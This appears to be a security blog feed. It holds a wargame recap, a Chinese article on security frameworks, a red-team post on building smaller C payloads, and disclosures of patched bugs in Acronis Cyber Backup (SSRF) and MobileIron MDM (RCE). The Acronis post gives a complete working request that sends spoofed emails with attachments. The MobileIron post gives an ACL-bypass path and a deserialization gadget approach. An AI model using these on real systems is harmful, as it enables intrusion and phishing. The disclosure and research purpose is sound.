以上就是我們這次為 HITCON 2020 準備的 Wargame 的其中一道開放式題目的分享和大家的解法介紹,不知道各位喜不喜歡呢?喜歡的話記得訂閱、按讚、分享以及開啟小鈴鐺唷!

題外話,這次我們總共有 5 道 100 分題目,是領取小獎品的基本條件,但我們還準備了 3 道僅有 1 分的 bonus 題目,類型是 2 個 web 與 1 個唯一的 pwn,讓大家能進一步挑戰進階實戰能力,而這次有解開至少一道 bonus 題的為以下兩位參加者:

  • 11/14 Balsn CTF 2020 總獎金十萬元: 502 分
  • FI: 501

友情工商:由台灣知名 CTF 戰隊之一的 Balsn 舉辦的 Balsn CTF 2020 將在 11/14 舉辦,他們準備了豐富的比賽獎金與充滿創意、技術性的題目,想證明實力的朋友們可不要錯過了!

Balsn Twitter: https://twitter.com/balsnctf/status/1316925652700889090 Balsn CTF 2020 on CTFtime: https://ctftime.org/event/1122/

另外的另外,最後讓我們恭喜 yuawn (https://twitter.com/_yuawn) 以 1 分之姿榮獲 DEVCORE Wargame 最後 1 名!全場排行榜上唯一得分不超過 100 的參加者,同時他也取得了 pwn 題目的首殺兼唯一解,恭喜他 👏👏。

最後附上今年的前十名,就讓我們 2021 年再見囉~

Place Team Score
1 11/14 Balsn CTF 2020 總獎金十萬元 502
2 FI 501
3 mico 500
4 ankleboy 500
5 hans00 500
6 Meow 500
7 ginoah 500
8 cjiso1117 500
9 zodiuss 500
10 dalun 500

你的資安策略夠明確嗎?透過框架優先緩解真實威脅

12 October 2020 at 16:00

前言

這一篇是跟 Allen 在 iThome 2020 資安大會一起分享的主題。在國內,大家比較少討論資安策略這個議題。主要原因除了這個題目太過艱澀、無聊外,從商業的角度也不容易成為獲利的服務。而我們會想分享這個主題的原因與我們主要的服務「紅隊演練」有關。

執行紅隊演練三年多來,雖然協助企業找出威脅營運的重要入侵路徑,甚至發現防禦機制的不足之處,許多積極的客戶更想知道除了當次紅隊演練發現的問題外,是不是有更周延的方式來盤點防禦現況的不足。因此,我們開始尋找一個結構化且完整的方式來探究這個議題,開始思考國際標準、框架與紅隊演練之間的關係。希望除了從攻擊者的思維跟技巧找到企業的問題外,也能從防守方的角度思考企業長期而全面的防禦規劃。

複雜的問題,更要從策略面思考

資安是非常複雜而且分工細膩的工作,不確定問題的核心就無法釐清權責、安排資源,遑論降低再發的機率。因此要解決這個複雜問題需要有資安策略來支撐,而不是頭痛醫頭、腳痛醫腳。首先,我們把資安的防護分為三種階段:

  • 恢復原狀型:企業將主要的資安資源投放在日常的維運及問題查找上,包括確認當下發生的問題、進行緊急處理、災害控制、查明及分析發生原因、修復問題、研究對策避免再發生等等。
  • 防微杜漸型:將資源投入在對企業造成重大衝擊的問題上,並持續進行預防及回應的評估與演練、嘗試提前找出原因,加以預防或思考演練發生時應該執行的對策。
  • 追求理想/卓越型:盤點及分析問題的優、缺點,設定企業持續精進的目標,藉由行動計畫來達成目標。

根據我們的觀察,幾乎多數的企業都是落在「恢復原狀型」,但企業多半認知其為「防微杜漸型」。造成這個認知上的落差,主因來自於對自身安全狀況的不了解,導致對於風險的掌握程度產生誤判。因此,透過一個宏觀的策略思考,有助於盤點各種控制措施不足之處,才有機會將防禦縱深的機制拴緊螺絲,打造期望的防禦體系。

分層負責,各司其職

我們建議將縱深防禦以一個更全面的方式來檢視,分為 Executive Layer、Process Layer、Procedure Layer 以及 Technology Layer 四層,一個好的防禦策略,除了要做到 R & R (Role & Responsibility) 外,更重要的是在上而下制定策略之後,經由下而上的方式確保策略的有效性,因此不同階層的資安從業人員都有其需要關注的重點。

  • Executive Layer:資安長 (CISO) 的視角,關注足以影響組織營運的風險及緩解這些風險的資源是否充足。可以參考的標準包括 NIST 800-39、NIST 800-30、ISO 27005 以及 CIS RAM。
  • Process Layer:高階主管的視角,關注持續維持組織安全運作的管理程序是否足夠及落實、規劃未來組織資安的成熟度等。參考的標準包括 NIST Cybersecurity Framework、ISO 27001 等。
  • Procedure Layer:中階主管的視角,包括決定哪些安全控制措施要執行、執行的細緻程度,這些項目就是一般所謂的安全控制措施 (security control),例如組態設定、密碼管理、日誌紀錄的類型等,可以參考 NIST 800-53 或是 CIS Critical Security Controls 等規範。
  • Technology Layer:初階主管與技術人員的角度,包含針對攻擊者的技巧所應對的資安設備、自動化安全控制措施的工具、監控分析工具等等。目前這部份也是組織資安防禦的重點,可以參考資安設備支援 MITRE ATT&CK 的攻擊技巧來盤點現有的防禦缺口或透過 OWASP Cyber Defense Matrix (CDM) 定位產品。

框架與標準的定位

在說明完不同階層關注的重點後,這裡特別說明幾個重要 (或使用率較高) 的標準及框架。除了要知道哪些框架跟標準與資安有關外,同時也需要了解適用的情境、目的及彼此間的差異

  • ISO 27001:屬於 Process Layer,其提供建立資訊安全管理系統的標準,幫助組織管理和保護資訊資產,確保達到客戶或利害關係人其安全的期待;可以取得驗證。但要提醒的是,27001 作為一個實踐資訊安全管理 (Information Security System) 的標準,雖然具有文件化 (Documented) 要求的優點,但其要求項目多數在預防 (Prevent) 及避免 (Avoid) 上,較少著重在因應網路安全的偵測 (Detect) 及回應 (React) 上。
  • NIST Cybersecurity Framework (CSF):屬於 Process View,由美國主導的網路安全框架,提供關鍵基礎設施或一般企業幫助組織管理和保護資訊資產,確保其安全無慮;可以驗證並有成熟度模式,可以讓企業先描繪自己的資安狀態 (profile) 並藉由訂定目標逐年強化企業的安全。同時,明確的將安全要求結構化的分成識別 (Identify)、防禦 (Protect)、偵測 (Detect)、回應 (Respond) 及復原 (Recover),並支援其他安全標準與框架的對應,如 CIS CSC、COBIT、27001、NIST 800-53 等。

  • CIS Cybersecurity Control:資訊安全控制指引屬於 Procedure View,針對網路攻擊所應採取的控制項目提出優先執行順序,組織可依照自身的規模 (IG1-IG3) 執行對應的措施, 分為基礎型、基本型及組織型,共 20 個控制群組、178 個子控制項。

不良的資安防護狀態

實務上來說,企業的防禦策略有兩種不良的狀態

  1. 縱深防護不足:防禦機制不夠全面 (紅色缺口)、設備效果不如宣稱 (藍色缺口)、設備本身的限制 (橘色缺口);上述的問題,綜合而言,就會使得設備間的綜效無法阻斷攻擊鏈,形成技術層的破口。
  2. 配套措施的不完整:也就是「程序」及「流程」上的不足,假設某資安設備可以偵測到異常行為,資安人員如何分辨這是攻擊行為還是員工內部正常行為?多久內要及時回應進行處理、多久要發動鑑識?一旦上述的「程序」及「流程」沒有定義清楚,縱使設備本身是有效的,組織仍然會因為回應時間過慢,導致攻擊者入侵成功。

盤點各層次的守備範圍

那麼要如何改善這兩種不佳的防禦狀態?我們可以單獨使用 CDM 來評估技術層的守備範圍是否足夠,也可以使用它來作為程序、流程及技術層的跨階層的盤點;

CDM (Cyber Defense Matrix) 是 OWASP 的一個專案,由一個 5x5 的矩陣所構成。橫軸是 NIST CSF 的五大類別,而縱軸則是資產盤點常見的分類;組織可以利用這個矩陣來盤點企業 Technology View 建構的防禦設備,更精準的確認需要保護的資產是否在 NIST CSF 的每個類別都有對應的措施。

以 ISO 27001 作為例子,將其本文的要求及附錄 A 的控制措施,對應到 CDM 上,進而盤點 ISO 27001 在組織的程序面所能涵蓋的範圍。要注意的是,不同組織在盤點時,會產生不同的對應結果,這正是透過 CDM 來檢視的意義所在;例如在盤點「A.7.2.2 資訊安全認知、教育及訓練」時,企業要思考對於人員的教育訓練是否涵蓋到 NIST CSF 的五大類別,還是只包含人員意識的訓練;另外以「A.6.2.2 遠距工作」的防護機制,除了針對網路層及應用程式保護外,管理程序是否也包含遠距工作的資料及設備要求?

接著,往下一層 (Procedure Layer),也將企業現有的控制措施,對應到 CDM 中。這邊以 CIS CSC 為例,淺藍色的部份屬於基本型的控制群組、灰色部分為基礎型控制群組,組織型的控制群組因為比較偏向程序面,因此比較難單獨歸屬在特定的 CDM 區塊中。

透過真實的威脅,補足資安策略的不足

在透過 CDM 盤點完 Procedure Layer 及 Process Layer 後,企業接著可以透過資安事故、威脅情資、紅隊演練或模擬入侵攻擊工具 (BAS) 等貼近真實威脅的服務或工具,來思考資安策略的不足之處。這邊我們以一個紅隊演練的部分成果作為案例,來貫穿本篇文章的應用。

在這個案例中,我們約略可以發現幾個問題:

  1. 程式撰寫不夠安全:以致存在任意檔案上傳的漏洞。
  2. 不同系統間使用共用帳號密碼:導致撞庫攻擊可以成功,而監控機制或組態管理顯然未發揮作用。
  3. 未依照資料機敏性進行網段區隔:對外服務網段可以透過 RDP 連線至 core zone。
  4. 特權帳號與存取控制未進行關聯分析:致可以使用 backup 帳號登入 AD 網域控制器。

上述的 4 個項目,是直覺在盤點時可能想到的疏漏項目。但要怎麼確認還有其他根因 (root cause) 是企業沒思考到的呢?這時候就可以利用已知的標準及框架,搭配先前盤點好的控制項目,來更為周延的思考目前還可以強化的控制措施;如果企業的資源有限,甚至可以參考 CIS CSC 對於優先權的建議順序,先確認組織實作群組 (Implementation Group) ,再依基本型、基礎型及組織型,訂定短、中、長期計畫及投放資源,有目標的改善防禦能耐。

最後,可以將上圖找出 Procedure Layer 的控制項目,對應到 Process Layer 的盤點結果,檢視流程上對應的作法。以 「14.1、依據敏感性網路進行區隔」為例,去評估 ISO 27001 中「A.6.2.2 遠距工作」的要求上,在設備、應用程式、網路、資料及使用者,是否都有做好網路區隔;或是「6.3 開啟更詳盡的日誌」,評估在 ISO 27001 中「A.16.1.5」對於資訊安全事故的回應上,在偵測、回應跟復原上,是否都有對應的程序可以支持,監控到發出的告警。

透過本篇的方法論可以從技術、程序、流程到風險,讓不同階層的資安從業人員有一致性的溝通方式。我們希望資安策略對於企業是一個真正可被實作、建立出短、中、長期目標的務實作為,而非只是一個組織治理中的一個高深名詞。

Smaller C Payloads on Windows

25 September 2020 at 15:20

Smaller C Payloads on Window

Introduction

Many thanks to 0xPat for his post on malware development, which is where the inspiration for this post came from.

When writing payloads for use in penetration tests or red team engagements, smaller is generally better. No matter the language you use, there is always a certain amount of overhead required for running a binary, and in the case of C, this is the C runtime library, or CRT. The C runtime is “a set of low-level routines used by a compiler to invoke some of the behaviors of a runtime environment, by inserting calls to the runtime library into compiled executable binary. The runtime environment implements the execution model, built-in functions, and other fundamental behaviors of a programming language”. On Windows, this means the various *crt.lib libraries that are linked against when you use C/C++. You might be familiar with the common compiler flags /MT and /MTd, which statically link the C runtime into the final binary. This is commonly done when you don’t want to rely on using the versioned Visual C++ runtime that ships with the version of Visual Studio you happen to be using, as the target machine may not have this exact version. In that case you would need to include the Visual C++ Redistributable or somehow have the end user install it. Clearly this is not an ideal situation for pentesters and red teamers. The alternative is to statically link the C runtime when you build your payload file, which works well and does not rely on preexisting redistributables, but unfortunately increases the size of the binary.

How can we get around this?

Introducing msvcrt.dll

msvcrt.dll is a copy of the C runtime which is included in every version of Windows from Windows 95 on. It is present even on a fresh install of Windows that does not have any additional Visual C++ redistributables installed. This makes it an ideal candidate to use for our payload. The trick is how to reference it. 0xPat points to a StackOverflow answer that describes this process in rather general terms, but without some tinkering it is not immediately obvious how to get it working. This post is aimed at saving others some time figuring this part out (shout out to AsaurusRex!).

Creating msvcrt.lib

The idea is to find all the functions that msvcrt.dll exports and add them to a library file so the linker can reference them. The process flow is to dump the exports into a file with dumpbin.exe, parse the results into .def format, which can then be converted into a library file with lib.exe. I have created a GitHub gist here that contains the commands to do this. I use Windows for dumping the exports and creating the .lib file, and Linux to do some text processing to create the .def file. I won’t go over the steps here in detail here as they are well commented in the gist.

Some Caveats

It is important to note that using msvcrt.dll is not a perfect replacement for the full C runtime. It will provide you with the C standard library functions, but not the full set of features that the runtime normally provides. This includes things like initializing everything before calling the usual main function, handling command line arguments, and probably a lot of other stuff I have not yet run into. So depending on how many features of the runtime you use, this may or may not be a problem. C++ will likely have more issues than pure C, as many C++ features involving classes and constructors are handled by the runtime, especially during program initialization.

Using msvcrt.lib

Using msvcrt.lib is fairly straight forward, as long as you know the proper compiler and linker incantations. The first step is to define _NO_CRT_STDIO_INLINE at the top of your source files. This presumably disables the use of the CRT, though I’ve not seen this explicitly defined by Microsoft anywhere. I have noticed that this definition alone is not enough. There are several compiler and linker flags that need to be set as well. I will list them here in the context of C/C++ Visual Studio project settings, as well as providing the command line argument equivalents.

Visual Studio Project Settings

  • Linker settings:
    • Advanced -> Entrypoint -> something other than main/wmain/WinMain etc.
    • Input -> Ignore All Default Libraries -> YES
    • Input -> Additional Dependencies -> add the custom msvcrt.lib path, kernel32.lib, any other libraries you may need, like ntdll.dll
  • Compiler settings:
    • Code Generation -> Runtime Library -> /MT
    • Code Generation -> /GS- (off)
    • Advanced -> Compile As -> /TC (only if you’re using C and not C++)
    • All Options -> Basic Runtime Checks -> Default

cl.exe Settings

cl.exe /MT /GS- /Tc myfile.c /link C:\path\to\msvcrt.lib "kernel32.lib" "ntdll.lib" /ENTRY:"YourEntrypointFunction" /NODEFAULTLIB

Some notes on these settings. You must have an entrypoint that is not named one of the standard Windows C/C++ function names, like main or WinMain. These are used by the C runtime, and as the full C runtime is not included, they cannot be used. Likewise, runtime buffer overflow checks (/GS) and other runtime checks are part of the C library and so not available to us.

If you plan on using command line arguments, you can still do so, but you’ll need to use CommandLineToArgvW and link against Shell32.lib.

Conclusion

Using this method I’ve seen a size reduction from 8x-12x in the resulting binary. I hope this post can serve as helpful documentation for others trying to get this working. Feel free to contact me if you have any issues or questions, and especially if you have any improvements or better ways of accomplishing this.

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

14 September 2020 at 00:00

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

You have probably read one or more blog posts about SSRFs, many being escalated to RCE. While this might be the ultimate goal, this post is about an often overlooked impact of SSRFs: application logic impact.

This post will tell you the story about an unauthenticated SSRF affecting Acronis Cyber Backup up to v12.5 Build 16341, which allows sending fully customizable emails to any recipient by abusing a web service that is bound to localhost. The fun thing about this issue is that the emails can be sent as backup indicators, including fully customizable attachments. Imagine sending Acronis “Backup Failed” emails to the whole organization with a nice backdoor attached to it? Here you go.

Root Cause Analysis

So Acronis Cyber Backup is essentially a backup solution that offers administrators a powerful way to automatically backup connected systems such as clients and even servers. The solution itself consists of dozens of internally connected (web) services and functionalities, so it’s essentially a mess of different C/C++, Go, and Python applications and libraries.

The application’s main web service runs on port 9877 and presents you with a login screen:

Now, every hacker’s goal is to find something unauthenticated. Something cool. So I’ve started to dig into the source code of the main web service to find something cool. Actually, it didn’t take me too long to discover that something in a method called make_request_to_ams:

# WebServer/wcs/web/temp_ams_proxy.py:

def make_request_to_ams(resource, method, data=None):
    port = config.CONFIG.get('default_ams_port', '9892')
    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
[...]

The main interesting thing here is the call to get_ams_address(request.headers), which is used to construct a Uri. The application reads out a specific request header called Shard within that method:

def get_ams_address(headers):
    if 'Shard' in headers:
        logging.debug('Get_ams_address address from shard ams_host=%s', headers.get('Shard'))
        return headers.get('Shard')  # Mobile agent >= ABC5.0

When having a further look at the make_request_to_ams call, things are getting pretty clear. The application uses the value from the Shard header in a urllib.request.urlopen call:

def make_request_to_ams(resource, method, data=None):
[...]
    logging.debug('Making request to AMS %s %s', method, uri)
    headers = dict(request.headers)
    del headers['Content-Length']
    if not data is None:
        headers['Content-Type'] = 'application/json'
    req = urllib.request.Request(uri,
                                 headers=headers,
                                 method=method,
                                 data=data)
    resp = None
    try:
        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
    except Exception as e:
        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
    return resp

So this is a pretty straight-forward SSRF including a couple of bonus points making the SSRF even more powerful:

  • The instantiation of the urllib.request.Request class uses all original request headers, the HTTP method from the request, and the even the whole request body.
  • The response is fully returned!

The only thing that needs to be bypassed is the hardcoded construction of the destination Uri since the API appends a semicolon, a port, and a resource to the requested Uri:

uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)

However, this is also trivially easy to bypass since you only need to append a ? to turn those into parameters. A final payload for the Shard header, therefore, looks like the following:

Shard: localhost?

Finding Unauthenticated Routes

To exploit this SSRF we need to find a route which is reachable without authentication. While most of CyberBackup’s routes are only reachable with authentication, there is one interesting route called /api/ams/agents which is kinda different:

# WebServer/wcs/web/temp_ams_proxy.py:
_AMS_ADD_DEVICES_ROUTES = [
    (['POST'], '/api/ams/agents'),
] + AMS_PUBLIC_ROUTES

Every request to this route is passed to the route_add_devices_request_to_ams method:

def setup_ams_routes(app):
[...]
    for methods, uri, *dummy in _AMS_ADD_DEVICES_ROUTES:
        app.add_url_rule(uri,
                         methods=methods,
                         view_func=_route_add_devices_request_to_ams)
[...]

This in return does only check whether the allow_add_devices configuration is enabled (which is the standard config) before passing the request to the vulnerable _route_the_request_to_ams method:

               
def _route_add_devices_request_to_ams(*dummy_args, **dummy_kwargs):
    if not config.CONFIG.get('allow_add_devices', True):
        raise exceptions.operation_forbidden_error('Add devices')

    return _route_the_request_to_ams(*dummy_args, **dummy_kwargs)

So we’ve found our attackable route without authentication here.

Sending Fully Customized Emails Including An Attachment

Apart from doing meta-data stuff or similar, I wanted to entirely fire the SSRF against one of Cyber Backup’s internal web services. There are many these, and there are a whole bunch of web services whose authorization concept solely relies only on being callable from the localhost. Sounds like a weak spot, right?

One interesting internal web service is listening on localhost port 30572: the Notification Service. This service offers a variety of functionality to send out notifications. One of the provided endpoints is /external_email/:

@route(r'^/external_email/?')
class ExternalEmailHandler(RESTHandler):
    @schematic_request(input=ExternalEmailValidator(), deserialize=True)
    async def post(self):
        try:
            error = await send_external_email(
                self.json['tenantId'], self.json['eventLevel'], self.json['template'], self.json['parameters'],
                self.json.get('images', {}), self.json.get('attachments', {}), self.json.get('mainRecipients', []),
                self.json.get('additionalRecipients', [])
            )
            if error:
                raise HTTPError(http.BAD_REQUEST, reason=error.replace('\n', ''))
        except RuntimeError as e:
            raise HTTPError(http.BAD_REQUEST, reason=str(e))

I’m not going through the send_external_email method in detail since it is rather complex, but this endpoint essentially uses parameters supplied via HTTP POST to construct an email that is send out afterwards.

The final working exploit looks like the following:

POST /api/ams/agents HTTP/1.1
Host: 10.211.55.10:9877
Shard: localhost:30572/external_email?
Connection: close
Content-Length: 719
Content-Type: application/json;charset=UTF-8

{"tenantId":"00000000-0000-0000-0000-000000000000",
"template":"true_image_backup",
"parameters":{
"what_to_backup":"what_to_backup",
"duration":2,
"timezone":1,
"start_time":1,
"finish_time":1,
"backup_size":1,
"quota_servers":1,
"usage_vms":1,
"quota_vms":1,"subject_status":"subject_status",
"machine_name":"machine_name",
"plan_name":"plan_name",
"subject_hierarchy_name":"subject_hierarchy_name",
"subject_login":"subject_login",
"ams_machine_name":"ams_machine_name",
"machine_name":"machine_name",
"status":"status","support_url":"support_url"
},
"images":{"test":"./critical-alert.png"},
"attachments":{"test.html":"PHU+U29tZSBtb3JlIGZ1biBoZXJlPC91Pg=="},
"mainRecipients":["[email protected]"]}

This involves a variety of “customizations” for the email including a base64-encoded attachments value. Issuing this POST request returns null:

but ultimately sends out the email to the given mainRecipients including some attachments:

Perfectly spoofed mail, right ;-) ?

The Fix

Acronis fixed the vulnerability in version v12.5 Build 16342 of Acronis Cyber Backup by changing the way that get_ams_address gets the actual Shard address. It now requires an additional authorization header with a JWT that is passed to a method called resolve_shard_address:

# WebServer/wcs/web/temp_ams_proxy.py:
def get_ams_address(headers):
    if config.is_msp_environment():
        auth = headers.get('Authorization')
        _bearer_prefix = 'bearer '
        _bearer_prefix_len = len(_bearer_prefix)
        jwt = auth[_bearer_prefix_len:]
        tenant_id = headers.get('X-Apigw-Tenant-Id')
        logging.info('GET_AMS: tenant_id: {}, jwt: {}'.format(tenant_id, jwt))
        if tenant_id and jwt:
            return wcs.web.session.resolve_shard_address(jwt, tenant_id)

While both values tenant_id and jwt are not explicitly validated here, they are simply used in a new hardcoded call to the API endpoint /api/account_server/tenants/ which ultimately verifies the authorization:

# WebServer/wcs/web/session.py:
def resolve_shard_address(jwt, tenant_id):
    backup_account_server = config.CONFIG['default_backup_account_server']
    url = '{}/api/account_server/tenants/{}'.format(backup_account_server, tenant_id)

    headers = {
        'Authorization': 'Bearer {}'.format(jwt)
    }

    from wcs.web.proxy import make_request
    result = make_request(url,
                          logging.getLogger(),
                          method='GET',
                          headers=headers).json()
    kind = result['kind']
    if kind not in ['unit', 'customer']:
        raise exceptions.unsupported_tenant_kind(kind)
    return result['ams_shard']

Problem solved.

How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM

11 September 2020 at 16:00

English Version 中文版本

Hi, it’s a long time since my last article. This new post is about my research this March, which talks about how I found vulnerabilities on a leading Mobile Device Management product and bypassed several limitations to achieve unauthenticated RCE. All the vulnerabilities have been reported to the vendor and got fixed in June. After that, we kept monitoring large corporations to track the overall fixing progress and then found that Facebook didn’t keep up with the patch for more than 2 weeks, so we dropped a shell on Facebook and reported to their Bug Bounty program!

This research is also presented at HITCON 2020. You can check the slides here


As a Red Teamer, we are always looking for new paths to infiltrate the corporate network from outside. Just like our research in Black Hat USA last year, we demonstrated how leading SSL VPNs could be hacked and become your Virtual “Public” Network! SSL VPN is trusted to be secure and considered the only way to your private network. But, what if your trusted appliances are insecure?

Based on this scenario, we would like to explore new attack surfaces on enterprise security, and we get interested in MDM, so this is the article for that!

What is MDM?

Mobile Device Management, also known as MDM, is an asset assessment system that makes the employees’ BYOD more manageable for enterprises. It was proposed in 2012 in response to the increasing number of tablets and mobile devices. MDM can guarantee that the devices are running under the corporate policy and in a trusted environment. Enterprise could manage assets, install certificates, deploy applications and even lock/wipe devices remotely to prevent data leakage as well.

UEM (Unified Endpoint Management) is a newer term relevant to MDM which has a broader definition for managed devices. Following we use MDM to represent similar products!

Our target

MDM, as a centralized system, can manage and control all employees’ devices. It is undoubtedly an ideal asset assessment system for a growing company. Besides, MDM must be reachable publicly to synchronize devices all over the world. A centralized and public-exposing appliance, what could be more appealing to hackers?

Therefore, we have seen hackers and APT groups abusing MDM these years! Such as phishing victims to make MDM a C&C server of their mobile devices, or even compromising the corporate exposed MDM server to push malicious Trojans to all devices. You can read the report Malicious MDM: Let’s Hide This App by Cisco Talos team and First seen in the wild - Malware uses Corporate MDM as attack vector by CheckPoint CPR team for more details!

From previous cases, we know that MDM is a solid target for hackers, and we would like to do research on it. There are several MDM solutions, even famous companies such as Microsoft, IBM and Apple have their own MDM solution. Which one should we start with?

We have listed known MDM solutions and scanned corresponding patterns all over the Internet. We found that the most prevalent MDMs are VMware AirWatch and MobileIron!

So, why did we choose MobileIron as our target? According to their official website, more than 20,000 enterprises chose MobileIron as their MDM solution, and most of our customers are using that as well. We also know Facebook has exposed the MobileIron server since 2016. We have analyzed Fortune Global 500 as well, and found more than 15% using and exposing their MobileIron server to the public! Due to above reasons, it became our main target!

Where to Start

From past vulnerabilities, we learned there aren’t too many researchers diving into MobileIron. Perhaps the attack vector is still unknown. But we suspect the main reason is that the firmware is too hard to obtain. When researching an appliance, turning a pure BlackBox testing into GrayBox, or WhiteBox testing is vital. We spent lots of time searching for all kinds of information on the Internet, and ended up with an RPM package. This RPM file is supposed to be the developer’s testing package. The file is just sitting on a listable WebRoot and indexed by Google Search.

Anyway, we got a file to research. The released date of the file is in early 2018. It seems a little bit old but still better than nothing!

P.S. We have informed MobileIron and the sensitive files has been removed now.

Finding Vulnerabilities

After a painful time solving the dependency hell, we set the testing package up finally. The component is based on Java and exposed three ports:

  • 443 - the user enrollment interface
  • 8443 - the appliance management interface
  • 9997 - the MobileIron device synchronization protocol (MI Protocol)

All opened ports are TLS-encrypted. Apache is in the front of the web part and proxies all connections to backend, a Tomcat with Spring MVC inside.

Due to the Spring MVC, it’s hard to find traditional vulnerabilities like SQL Injection or XSS from a single view. Therefore, examining the logic and architecture is our goal this time!

Talking about the vulnerability, the root cause is straightforward. Tomcat exposed a Web Service that deserializes user input with Hessian format. However, this doesn’t mean we can do everything! The main effort of this article is to solve that, so please see the exploitation below.

Although we know the Web Service deserializes the user input, we can not trigger it. The endpoint is located on both:

  • User enrollment interface - https://mobileiron/mifs/services/
  • Management interface - https://mobileiron:8443/mics/services/

We can only touch the deserialization through the management interface because the user interface blocks the Web Service access. It’s a critical hit for us because most enterprises won’t expose their management interface to the Internet, and a management-only vulnerability is not useful to us so that we have to try harder. :(

Scrutinizing the architecture, we found Apache blocks our access through Rewrite Rules. It looks good, right?

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

MobileIron relied on Apache Rewrite Rules to block all the access to Web Service. It’s in the front of a reverse-proxy architecture, and the backend is a Java-based web server.

Have you recalled something?


Yes, the Breaking Parser Logic! It’s the reverse proxy attack surface I proposed in 2015, and presented at Black Hat USA 2018. This technique leverage the inconsistency between the Apache and Tomcat to bypass the ACL control and reaccess the Web Service. BTW, this excellent technique is also applied to the recently F5 BIG-IP TMUI RCE vulnerability!

https://mobileiron/mifs/.;/services/someService

Exploiting Vulnerabilities

OK, now we have access to the deserialization wherever it’s on enrollment interface or management interface. Let’s go back to exploitations!

Moritz Bechler has an awesome research which summarized the Hessian deserialization vulnerability on his whitepaper, Java Unmarshaller Security. From the marshalsec source code, we learn the Hessian deserialization triggers the equals() and hashcode() while reconstructing a HashMap. It could also trigger the toString() through the XString, and the known exploit gadgets so far are:

  • Apache XBean
  • Caucho Resin
  • Spring AOP
  • ROME EqualsBean/ToStringBean

In our environment, we could only trigger the Spring AOP gadget chain and get a JNDI Injection.

  Name Effect
x Apache XBean JNDI Injection
x Caucho Resin JNDI Injection
Spring AOP JNDI Injection
x ROME EqualsBean RCE

Once we have a JNDI Injection, the rest parts of exploitations are easy! We can just leverage Alvaro Muñoz and Oleksandr Mirosh’s work, A Journey From JNDI/LDAP to Remote Code Execution Dream Land, from Black Hat USA 2016 to get the code execution… Is that true?


Since Alvaro Muñoz and Oleksandr Mirosh introduced this on Black Hat, we could say that this technique helps countless security researchers and brings Java deserialization vulnerability into a new era. However, Java finally mitigated the last JNDI/LDAP puzzle in October 2018. After that, all java version higher than 8u181, 7u191, and 6u201 can no longer get code execution through JNDI remote URL-Class loading. Therefore, if we exploit the Hessian deserialization on the latest MobileIron, we must face this problem!

Java changed the default value of com.sun.jndi.ldap.object.trustURLCodebase to False to prevent attackers from downloading remote URL-Class to get code executions. But only this has been prohibited. We can still manipulate the JNDI and redirect the Naming Reference to a local Java Class!

The concept is a little bit similar to Return-Oriented Programming, utilizing a local existing Java Class to do further exploitations. You can refer to the article Exploiting JNDI Injections in Java by Michael Stepankin in early 2019 for details. It describes the attack on POST-JNDI exploitations and how to abuse the Tomcat’s BeanFactory to populate the ELProcessor gadget to get code execution. Based on this concept, researcher Welkin also provides another ParseClass gadget on Groovy. As described in his (Chinese) article:

除了 javax.el.ELProcessor,当然也还有很多其他的类符合条件可以作为 beanClass 注入到 BeanFactory 中实现利用。举个例子,如果目标机器 classpath 中有 groovy 的库,则可以结合之前 Orange 师傅发过的 Jenkins 的漏洞实现利用

It seems the Meta Programming exploitation in my previous Jenkins research could be used here as well. It makes the Meta Programming great again :D


The approach is fantastic and looks feasible for us. But both gadgets ELProcessor and ParseClass are unavailable due to our outdated target libraries. Tomcat introduced the ELProcessor since 8.5, but our target is 7. As for the Groovy gadget, the target Groovy version is too old (1.5.6 from 2008) to support the Meta Programming, so we still have to find a new gadget by ourselves. We found a new gadget on GroovyShell in the end. If you are interested, you can check the Pull Request I sent to the JNDI-Injection-Bypass project!

Attacking Facebook

Now we have a perfect RCE by chaining JNDI Injection, Tomcat BeanFactory and GroovyShell. It’s time to hack Facebook!

Aforementioned, we knew the Facebook uses MobileIron since 2016. Although the server’s index responses 403 Forbidden now, the Web Service is still accessible!

Everything is ready and wait for our exploit! However, several days before our scheduled attack, we realized that there is a critical problem in our exploit. From our last time popping shell on Facebook, we noticed it blocks outbound connections due to security concerns. The outbound connection is vital for JNDI Injection because the idea is to make victims connecting to a malicious server to do further exploitations. But now, we can’t even make an outbound connection, not to mention others.


So far, all attack surfaces on JNDI Injection have been closed, we have no choice but to return to Hessian deserialization. But due to the lack of available gadgets, we must discover a new one by ourselves!


Before discovering a new gadget, we have to understand the existing gadgets’ root cause properly. After re-reading Moritz Bechler’s paper, a certain word interested me:

Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception.


A question quickly came up in my mind: Why did the author leave this word here? Although it failed with exceptions, there must have been something special so that the author write this down.

Our target is running with a very old Groovy, so we are guessing that the readResolve() constrain might not have been applied to the code base yet! We compared the file groovy/runtime/MethodClosure.java between the latest and 1.5.6.

$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java

>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

Yes, we are right. There is no ALLOW_RESOLVE in Groovy 1.5.6, and we later learned CVE-2015-3253 is just for that. It’s a mitigation for the rising Java deserialization vulnerability in 2015. Since Groovy is an internally used library, developers won’t update it if there is no emergency. The outdated Groovy could also be a good case study to demonstrated how a harmless component can leave you compromised!

Of course we got the shell on Facebook in the end. Here is the video:

Vulnerability Report and Patch

We have done all the research on March and sent the advisory to MobileIron at 4/3. The MobileIron released the patch on 6/15 and addressed three CVEs for that. You can check the official website for details!

  • CVE-2020-15505 - Remote Code Execution
  • CVE-2020-15506 - Authentication Bypass
  • CVE-2020-15507 - Arbitrary File Reading

After the patch has been released, we start monitoring the Internet to track the overall fixing progress. Here we check the Last-Modified header on static files so that the result is just for your information. (Unknown stands for the server closed both 443 and 8443 ports)


At the same time, we keep our attentions on Facebook as well. With 15 days no-patch confirm, we finally popped a shell and report to their Bug Bounty program at 7/2!

Conclusion

